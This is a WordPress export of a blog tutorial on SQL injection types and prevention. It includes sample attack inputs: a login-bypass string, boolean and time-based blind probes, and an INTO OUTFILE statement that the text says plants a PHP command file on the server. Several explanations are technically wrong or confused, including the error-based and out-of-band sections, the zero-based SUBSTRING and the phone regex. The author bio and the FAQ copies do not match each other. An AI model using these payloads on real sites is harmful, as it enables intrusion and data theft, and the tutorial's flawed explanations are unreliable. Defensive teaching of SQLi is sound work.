{"id":505,"date":"2022-08-06T22:53:54","date_gmt":"2022-08-06T22:53:54","guid":{"rendered":"https:\/\/securitybriefing.net\/?p=505"},"modified":"2022-08-06T22:53:54","modified_gmt":"2022-08-06T22:53:54","slug":"sql-injection-101-ce-este-sqli-si-cum-sa-previi-atacurile","status":"publish","type":"post","link":"https:\/\/securitybriefing.net\/ro\/securitate\/sql-injection-101-ce-este-sqli-si-cum-sa-previi-atacurile\/","title":{"rendered":"SQL Injection 101: What is SQLi and How to Prevent Attacks"},"content":{"rendered":"<h2 class=\"wp-block-heading\" id=\"what-is-sql-injection\"><strong>What is SQL injection<\/strong><\/h2>\n\n\n<p>SQL injection (SQLi) is a type of attack that lets criminals execute malicious SQL statements against vulnerable web applications. By bypassing the application's security measures, attackers can access sensitive data such as customer information, personal data, trade secrets and more. Here we discuss what SQL injection is, how it works and how you can prevent attacks.<\/p>\n\n\n\n<p>SQL injection attacks can occur on any website that uses a SQL database. This type of attack lets attackers gain access to your critical data. They can view consumer information, personal data, trade secrets and intellectual property. 
This is one of the most serious types of attack against web applications, according to OWASP.<\/p>\n\n\n<h2 class=\"wp-block-heading\" id=\"types-of-sql-injection\"><strong>Types of SQL injection<\/strong><\/h2>\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"542\" class=\"wp-image-515\" src=\"http:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/types-of-SQL-Injectin-2.png\" alt=\"Types of SQL injection\" srcset=\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/types-of-SQL-Injectin-2.png 1024w, https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/types-of-SQL-Injectin-2-300x159.png 300w, https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/types-of-SQL-Injectin-2-768x407.png 768w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n<h3 class=\"wp-block-heading\" id=\"inband-sqli\"><strong>In-band SQLi<\/strong><\/h3>\n\n\n<p>In-band SQL injection is an attack in which the attacker uses the same channel to send queries and receive the results. In-band means the response comes back over the same communication medium. The attacker's goal is to get the response immediately, in the web browser if possible, when carrying out the attack manually with a web browser.<\/p>\n\n\n\n<p><strong>Example of in-band SQL injection<\/strong><\/p>\n\n\n\n<p>The most common way for an attacker to perform in-band SQL injection is to modify the request so that they can see the personal information of the current user. This is done by changing a value sent as part of the request. 
For example, if the statement was meant to display the user's name, the attacker could change it so that their name is displayed instead.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-vivid-green-cyan-color has-black-background-color has-text-color has-background\">SELECT * FROM users WHERE user_id LIKE 'utilizator_curent'<\/pre>\n\n\n\n<p>Error-based SQLi and union-based SQLi are the two most common forms of in-band SQL injection.<\/p>\n\n\n<h4 class=\"wp-block-heading\" id=\"errorbased-sqli\"><strong>Error-based SQLi<\/strong><\/h4>\n\n\n<p>Error-based SQLi is an in-band SQL injection technique that relies on the database server's error messages to discover the structure of the database. Error-based SQL injection is the most common type of in-band SQL injection.<\/p>\n\n\n\n<p><strong>Example of error-based SQLi:<\/strong><\/p>\n\n\n\n<p>If an attacker tries to log in with the following data:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-vivid-green-cyan-color has-black-background-color has-text-color has-background\">nume_utilizator: ' OR 'a'='a\nparol\u0103: orice<\/pre>\n\n\n\n<p>The database will return an error because the resulting statement is syntactically incorrect. 
The error message will reveal information about the database that the attacker can use to their advantage.<\/p>\n\n\n<h4 class=\"wp-block-heading\" id=\"unionbased-sqli\"><strong>Union-based SQLi<\/strong><\/h4>\n\n\n<p>Union-based SQL injection is an in-band technique for extracting information from a website by using the UNION operator to combine the results of two or more SELECT statements.<\/p>\n\n\n<h3 class=\"wp-block-heading\" id=\"blind-sql-injection\"><strong>Blind SQL injection<\/strong><\/h3>\n\n\n<p>Blind SQL injection is an attack in which the attacker tries to get answers from the database by asking questions that produce a true or false result. The attacker uses error messages to see whether the application responds differently when a specific code is used.<\/p>\n\n\n\n<p>When a hacker uses SQL injection, the web application may display critical database warning messages indicating that the SQL query syntax is incorrect. Blind SQL injection works the same way as traditional SQL injection, except for how the data is obtained from the database. 
If the database does not expose enough information for an attacker to exploit directly, the attacker has to ask a series of questions to obtain data.<\/p>\n\n\n\n<p>Blind SQL injection is divided into boolean-based blind SQLi and time-based blind SQLi.<\/p>\n\n\n<h4 class=\"wp-block-heading\" id=\"booleanbased-blind-sqli\"><strong>Boolean-based blind SQLi<\/strong><\/h4>\n\n\n<p>Boolean-based blind SQL injection is an attack in which the attacker tries to get answers from the database by asking questions that produce a true or false result. The attacker uses error messages to see whether the application responds differently when a specific code is used.<\/p>\n\n\n\n<p>Example of boolean-based blind SQLi:<\/p>\n\n\n\n<p>If an attacker wants to find out the database type, they would use the following statement:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-vivid-green-cyan-color has-black-background-color has-text-color has-background\">SELECT * FROM users WHERE user_id LIKE 'utilizator_curent' and database() like '%type%'<\/pre>\n\n\n\n<p>If the database is MySQL, the result would be something like this:<\/p>\n\n\n\n<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and database() like '%type%'' at line<\/p>\n\n\n<h4 class=\"wp-block-heading\" id=\"timebased-blind-sql-injection\"><strong>Time-based blind SQL injection<\/strong><\/h4>\n\n\n<p>A time-based blind attack is one in which a SQL command is sent to the server with code that makes the query execute more slowly.<\/p>\n\n\n\n<p>Time-based blind attacks 
allow attackers to extract data based on the response time. Such an attack is known as a blind or inferential injection attack. It is a type of attack in which there is no data flow between the attacker and the database, and because there is no direct response it is also known as a blind injection attack.<\/p>\n\n\n\n<p>The response time indicates whether the answer is correct or incorrect. If the answer is negative, the intruder makes another request. This attack technique is slow because the hacker has to go through every single character, especially when attacking massive databases.<\/p>\n\n\n\n<p><strong>Example of blind SQLi<\/strong><\/p>\n\n\n\n<p>In this example, the attacker tries to determine whether the user with id=999 exists in the database. To do this, they use the following statement:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-vivid-green-cyan-color has-black-background-color has-text-color has-background\">IF(SUBSTRING((SELECT password FROM users WHERE user_id=999),0, LEN('secret'))='secret', SLEEP(30), 'fals')<\/pre>\n\n\n\n<p>If the user with id 999 exists in the database and their password is 'secret', the application will sleep for 30 seconds. If the user does not exist in the database, the application returns the literal 'fals' (false) without delay.<\/p>\n\n\n<h3 class=\"wp-block-heading\" id=\"outofband-sqli\"><strong>Out-of-band SQLi<\/strong><\/h3>\n\n\n<p>Someone who wants to steal data can send SQL code to a database server in a way that is not part of the usual communication between the server and other computers. 
This can be done by sending information to the server via DNS or HTTP requests.<\/p>\n\n\n\n<p>The application's response is not affected by whether data is returned, whether there is a problem with the database, or how long the query takes to execute. Out-of-band channels can be used in network interactions to trigger events at will. Depending on an injected condition, these can be triggered conditionally to gain knowledge one bit at a time.<\/p>\n\n\n\n<p>Data can also leak through several network protocols from network interactions. The visual represents the request sent by the web application to the application's database.<\/p>\n\n\n\n<p><strong>Example of out-of-band SQLi<\/strong><\/p>\n\n\n\n<p>In this example, the attacker tries to determine whether a specific user exists in the database. To do this, they use the following statement:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-vivid-green-cyan-color has-black-background-color has-text-color has-background\">SELECT user_id FROM users WHERE username='$username' AND password='$password' LIMIT 0,0 UNION SELECT NULL,'' INTO OUTFILE '\/var\/opt\/databases\/$filename.php'; --<\/pre>\n\n\n\n<p>The application will return the user's ID if the user exists in the database. If the user does not exist in the database, the application will create a file containing PHP code that can be used to execute system commands. 
The attacker can then use this file to run commands on the server.<\/p>\n\n\n<h2 class=\"wp-block-heading\" id=\"how-to-prevent-an-sql-injection\"><strong>How to prevent SQL injection<\/strong><\/h2>\n\n\n<p>The best way to protect against SQL injection attacks is to use input validation, prepared statements and parameterized queries. Code should never use user input directly. Developers must sanitize all input, not just input from web forms such as login forms. Single quotes should be removed from any suspicious code components. It is also a good idea to hide database errors on live sites to avoid disclosing them accidentally. SQL injection can reveal information about a database system that attackers can use to their advantage.<\/p>\n\n\n\n<p>If you find a problem with your site, you should take it offline immediately and contact your hosting provider. They can help you determine whether your site has been compromised and what steps you need to take to fix the problem. In the meantime, make sure all users of your site are aware of the problem and change their passwords as soon as possible.<\/p>\n\n\n<h2 class=\"wp-block-heading\" id=\"prevention-tips-for-avoiding-sql-injections\"><strong>Prevention tips for avoiding SQL injections<\/strong><\/h2>\n\n\n<p>There are several ways to avoid SQL injection vulnerabilities in your programming language and database configuration. 
These techniques can be used with most databases, including XML ones. You can use them to make your databases more secure.<\/p>\n\n\n<h3 class=\"wp-block-heading\" id=\"1-use-of-properly-constructed-stored-procedures\">1) Use of properly constructed stored procedures<\/h3>\n\n\n<p>Beginners should start by learning how to create statements with variables. This is easier than building dynamic queries and easier to understand. Parameterized queries are where the developer writes all of the SQL code first and then supplies each parameter later. This method lets the database distinguish between code and data.<\/p>\n\n\n\n<p>Prepared statements help ensure that the intent of a query is not changed, even if someone tries to supply SQL instructions as input.<\/p>\n\n\n<h3 class=\"wp-block-heading\" id=\"2-allowlist-input-validation\">2) Allowlist input validation<\/h3>\n\n\n<p>SQL queries use bind variables in specific places for data. For example, if you use Python, you would use <strong>%s<\/strong> as a placeholder. 
You can use a regular expression to validate user input against an allowlist of the characters permitted in each bind variable.<\/p>\n\n\n\n<p>If you use JavaScript, you can use <strong>\\w<\/strong> to match alphanumeric characters and underscores.<\/p>\n\n\n\n<p>The allowlist should be as specific as possible to avoid false positives.<\/p>\n\n\n\n<p>For example, if you are looking for a US phone number, you would use the following regular expression:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-vivid-green-cyan-color has-black-background-color has-text-color has-background\">\/^\\d{11}$\/<\/pre>\n\n\n\n<p>This would match an 11-digit string that could be a phone number. If someone tried to submit something like '<strong>abcdef<\/strong>', it would not match and the input would be rejected as invalid.<\/p>\n\n\n\n<p>This helps ensure that your data stays safe and sound. If you need to use values from code instead of user parameters, that is fine too!<\/p>\n\n\n\n<p>However, if user parameter values are used to select specific table or column names, those values should be mapped to the corresponding table and column names so that unvalidated user input never reaches the query.<\/p>\n\n\n<h3 class=\"wp-block-heading\" id=\"3-use-whitelists\">3) Use whitelists<\/h3>\n\n\n<p>Do not filter user input based on blacklists of bad characters. Using whitelists of good characters that are expected in specific fields is far more effective. 
This stops SQL injection attacks before they start.<\/p>\n\n\n\n<p>For example, allow only digits and hyphens in the input field if you expect a phone number. If you expect an email address, allow only characters that are valid in an email address.<\/p>\n\n\n<h3 class=\"wp-block-heading\" id=\"4-use-the-most-uptodate-platforms\">4) Use the most up-to-date platforms<\/h3>\n\n\n<p>PHP has no SQLi protection in older web development platforms. Use the most up-to-date edition of the programming environment, language and associated technologies available. In PHP, for example, use PDO.<\/p>\n\n\n<h3 class=\"wp-block-heading\" id=\"5-scan-your-web-application-regularly\">5) Scan your web application regularly<\/h3>\n\n\n<p>SQL injections can be very hard to spot. It is important to scan your web application for vulnerabilities regularly.<\/p>\n\n\n<h3 class=\"wp-block-heading\" id=\"6-enforcing-least-privilege\">6) Enforcing least privilege<\/h3>\n\n\n<p>The principle of least privilege is a security concept that restricts users to the minimum amount of access they need to do their job. This includes limiting the number of accounts users have and the privileges those accounts hold.<\/p>\n\n\n\n<p>Least functionality restriction (LRF) is the practice and concept of restricting user rights, accounts and computing processes to only those resources needed for basic, acceptable tasks. 
This helps keep user rights or authorization levels at a minimum, which is vital for people to do their jobs efficiently.<\/p>\n\n\n\n<p>Least privilege is a security principle that requires applications, systems and devices to have only the permissions needed to perform a specific task. That way, the impact is limited if someone manages to exploit a vulnerability and do damage. This contrasts with giving users more permissions than they need, which increases the risk of significant damage in a SQL injection attack.<\/p>\n\n\n<h2 class=\"wp-block-heading\" id=\"sql-injection-frequently-asked-questions\"><strong>SQL injection: frequently asked questions<\/strong><\/h2>\n\n\n\n<div class=\"schema-faq wp-block-yoast-faq-block\">\n<div id=\"faq-question-1659826159348\" class=\"schema-faq-section\"><strong class=\"schema-faq-question\">What is the most common SQL injection?<\/strong>\n<p class=\"schema-faq-answer\">In-band SQL injection is the most common type of SQL injection attack. It occurs when an attacker can use the same communication channel to deliver the payload and gather the results.<\/p>\n<\/div>\n<div id=\"faq-question-1659826187832\" class=\"schema-faq-section\"><strong class=\"schema-faq-question\">What is the best defense against SQL injection?<\/strong>\n<p class=\"schema-faq-answer\">The best defense against SQL injection is to use parameterized queries. 
This type of query uses placeholder values for the parameters, which are supplied later. This method lets the database distinguish between code and data.<\/p>\n<\/div>\n<div id=\"faq-question-1659826216670\" class=\"schema-faq-section\"><strong class=\"schema-faq-question\">How is SQL injection detected?<\/strong>\n<p class=\"schema-faq-answer\">SQL injection can be detected in several ways. One method is to use a web application firewall (WAF). A WAF is a hardware or software device that sits between a web application and the internet. It inspects traffic for malicious activity and can block SQL injection attacks.<\/p>\n<\/div>\n<div id=\"faq-question-1659826245103\" class=\"schema-faq-section\"><strong class=\"schema-faq-question\">What is second-order SQL injection?<\/strong>\n<p class=\"schema-faq-answer\">Second-order SQL injection occurs when an attacker can inject a payload that is stored by the web application and executed later. This type of attack is harder to carry out because the attacker needs a way to trigger execution of the stored payload.<\/p>\n<\/div>\n<div id=\"faq-question-1659826275267\" class=\"schema-faq-section\"><strong class=\"schema-faq-question\">What is blind SQL injection?<\/strong>\n<p class=\"schema-faq-answer\">Blind SQL injection is an attack in which the attacker does not directly see the results of their payload. Instead, they must use true-or-false statements to infer information from the database. 
This type of attack is harder to execute, but it can be just as dangerous as other types of SQL injection.<\/p>\n<\/div>\n<div id=\"faq-question-1659826301781\" class=\"schema-faq-section\"><strong class=\"schema-faq-question\">What is a stacked query?<\/strong>\n<p class=\"schema-faq-answer\">A stacked query is a type of SQL injection in which the attacker uses multiple queries to extract information from the database. This type of attack is harder to execute, but it can be very dangerous if it succeeds.<\/p>\n<\/div>\n<div id=\"faq-question-1659826330814\" class=\"schema-faq-section\"><strong class=\"schema-faq-question\">What is error-based SQL injection?<\/strong>\n<p class=\"schema-faq-answer\">Error-based SQL injection is an attack in which the attacker uses database errors to infer information from the database. This attack is harder to execute, but it can be very dangerous if it succeeds.<\/p>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>What is SQL injection SQL injection (SQLi) is a type of attack that lets criminals execute malicious SQL statements against vulnerable web applications. Attackers can access sensitive data such as... 
<a class=\"more-link\" href=\"https:\/\/securitybriefing.net\/ro\/securitate\/sql-injection-101-ce-este-sqli-si-cum-sa-previi-atacurile\/\">Continue reading <span class=\"screen-reader-text\">SQL Injection 101: What is SQLi and How to Prevent Attacks<\/span><\/a><\/p>","protected":false},"author":1,"featured_media":644,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[27],"tags":[],"class_list":["post-505","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-security","entry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>What is SQLi and How to Prevent Attacks | securitybriefing<\/title>\n<meta name=\"description\" content=\"Learn the basics of SQL injection. what is SQL injection, how does it work, and what ways to protect your site from attacks.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/securitybriefing.net\/ro\/securitate\/sql-injection-101-ce-este-sqli-si-cum-sa-previi-atacurile\/\" \/>\n<meta property=\"og:locale\" content=\"ro_RO\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"What is SQLi and How to Prevent Attacks | securitybriefing\" \/>\n<meta property=\"og:description\" content=\"Learn the basics of SQL injection. 
what is SQL injection, how does it work, and what ways to protect your site from attacks.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/securitybriefing.net\/ro\/securitate\/sql-injection-101-ce-este-sqli-si-cum-sa-previi-atacurile\/\" \/>\n<meta property=\"og:site_name\" content=\"Security Briefing\" \/>\n<meta property=\"article:published_time\" content=\"2022-08-06T22:53:54+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png\" \/>\n\t<meta property=\"og:image:width\" content=\"558\" \/>\n\t<meta property=\"og:image:height\" content=\"500\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"security\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Scris de\" \/>\n\t<meta name=\"twitter:data1\" content=\"security\" \/>\n\t<meta name=\"twitter:label2\" content=\"Timp estimat pentru citire\" \/>\n\t<meta name=\"twitter:data2\" content=\"11 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/\"},\"author\":{\"name\":\"security\",\"@id\":\"https:\/\/securitybriefing.net\/#\/schema\/person\/e99d7bfcfc8ecee5ed34ef3f0416ee81\"},\"headline\":\"SQL Injection 101: What is SQLi and How to Prevent 
Attacks\",\"datePublished\":\"2022-08-06T22:53:54+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/\"},\"wordCount\":2130,\"publisher\":{\"@id\":\"https:\/\/securitybriefing.net\/#organization\"},\"image\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png\",\"articleSection\":[\"Security\"],\"inLanguage\":\"ro-RO\"},{\"@type\":[\"WebPage\",\"FAQPage\"],\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/\",\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/\",\"name\":\"What is SQLi and How to Prevent Attacks | securitybriefing\",\"isPartOf\":{\"@id\":\"https:\/\/securitybriefing.net\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png\",\"datePublished\":\"2022-08-06T22:53:54+00:00\",\"description\":\"Learn the basics of SQL injection. 
what is SQL injection, how does it work, and what ways to protect your site from attacks.\",\"breadcrumb\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#breadcrumb\"},\"mainEntity\":[{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814\"}],\"inLanguage\":\"ro-RO\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"ro-RO\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage\",\"url\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png\",\"contentUrl\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png\",\"width\":558,\"height\":500,\"caption\":\"sql 
injection\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/securitybriefing.net\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"SQL Injection 101: What is SQLi and How to Prevent Attacks\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/securitybriefing.net\/#website\",\"url\":\"https:\/\/securitybriefing.net\/\",\"name\":\"Security Briefing\",\"description\":\"Read cybersecurity news, online safety guides, cyber threat updates, and use free security tools from Security Briefing.\",\"publisher\":{\"@id\":\"https:\/\/securitybriefing.net\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/securitybriefing.net\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"ro-RO\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/securitybriefing.net\/#organization\",\"name\":\"Security Briefing\",\"url\":\"https:\/\/securitybriefing.net\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"ro-RO\",\"@id\":\"https:\/\/securitybriefing.net\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2023\/06\/security-briefing-logo-5.png\",\"contentUrl\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2023\/06\/security-briefing-logo-5.png\",\"width\":256,\"height\":70,\"caption\":\"Security 
Briefing\"},\"image\":{\"@id\":\"https:\/\/securitybriefing.net\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/securitybriefing.net\/#\/schema\/person\/e99d7bfcfc8ecee5ed34ef3f0416ee81\",\"name\":\"security\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"ro-RO\",\"@id\":\"https:\/\/securitybriefing.net\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/f882f35c703c897d1ec76c380b39ceed3f7309182d44a3177612bc192f6c9ddb?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/f882f35c703c897d1ec76c380b39ceed3f7309182d44a3177612bc192f6c9ddb?s=96&d=mm&r=g\",\"caption\":\"security\"},\"description\":\"admin is a senior staff writer for Government Technology. She previously wrote for PYMNTS and The Bay State Banner, and holds a B.A. in creative writing from Carnegie Mellon. She\u2019s based outside Boston.\",\"sameAs\":[\"http:\/\/securitybriefing.net\"],\"url\":\"https:\/\/securitybriefing.net\/ro\/author\/security\/\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348\",\"position\":1,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348\",\"name\":\"What is the most common SQL injection?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"In-band SQL injection is the most common type of SQL injection attack. 
It occurs when an attacker can use the same communication channel to deliver the payload and gather results.\",\"inLanguage\":\"ro-RO\"},\"inLanguage\":\"ro-RO\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832\",\"position\":2,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832\",\"name\":\"What is the best defense against SQL injection?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"The best defense against SQL injection is to use parameterized queries (prepared statements). The statement is sent to the database with placeholders, and the user-supplied values are bound to those placeholders separately, so the database always distinguishes code from data and the input can never change the structure of the query. Escaping or filtering input is a weaker fallback, and a least-privilege database account limits the damage if an injection is still found.\",\"inLanguage\":\"ro-RO\"},\"inLanguage\":\"ro-RO\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670\",\"position\":3,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670\",\"name\":\"How is SQL injection detected?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"SQL injection can be detected in several ways. One option is a web application firewall (WAF), a hardware or software filter that sits between the web application and the internet. 
It inspects requests for known injection patterns and can block many attacks, but it is a compensating control rather than a fix: the vulnerable query must still be corrected. Injection flaws are also found through code review, automated security testing, and by monitoring database error messages and unexpected queries in the application and database logs.\",\"inLanguage\":\"ro-RO\"},\"inLanguage\":\"ro-RO\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103\",\"position\":4,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103\",\"name\":\"What is second-order SQL injection?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"Second-order SQL injection occurs when an attacker injects a payload that the web application stores safely at first (for example in a profile field) and executes later, when another part of the application reads the stored value and concatenates it into a query. This type of attack is harder to find and exploit because the input point and the vulnerable query are separated, and the attacker needs a way to trigger the code path that uses the stored value.\",\"inLanguage\":\"ro-RO\"},\"inLanguage\":\"ro-RO\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267\",\"position\":5,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267\",\"name\":\"What is blind SQL injection?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"Blind SQL injection is an attack where the attacker does not directly see the results of their payload. Instead, they infer information from the application's behaviour, one bit at a time: a true-or-false condition that changes the page content (boolean-based), or a deliberate delay that changes the response time (time-based). 
This type of attack is slower to carry out but can be just as dangerous as other types of SQL injection, and it is routinely automated.\",\"inLanguage\":\"ro-RO\"},\"inLanguage\":\"ro-RO\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781\",\"position\":6,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781\",\"name\":\"What is a stacked query?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"A stacked (piggy-backed) query is a SQL injection technique where the attacker terminates the intended statement with a semicolon and appends a second statement of their own, such as an UPDATE, DELETE or INSERT. It only works when the database and the driver allow several statements in one call, but where it does, it lets the attacker run arbitrary statements rather than only read data, which makes it one of the most damaging forms of SQL injection.\",\"inLanguage\":\"ro-RO\"},\"inLanguage\":\"ro-RO\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814\",\"position\":7,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814\",\"name\":\"What is an error-based SQL injection?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"Error-based SQL injection is an attack where the attacker crafts input that makes the database raise an error whose message contains the data they want, for example by forcing a type conversion of a query result. It depends on detailed database errors reaching the response, so suppressing verbose error messages closes this channel, although the underlying injection still has to be fixed.\",\"inLanguage\":\"ro-RO\"},\"inLanguage\":\"ro-RO\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"What is SQLi and How to Prevent Attacks | securitybriefing","description":"Learn the basics of SQL injection. 
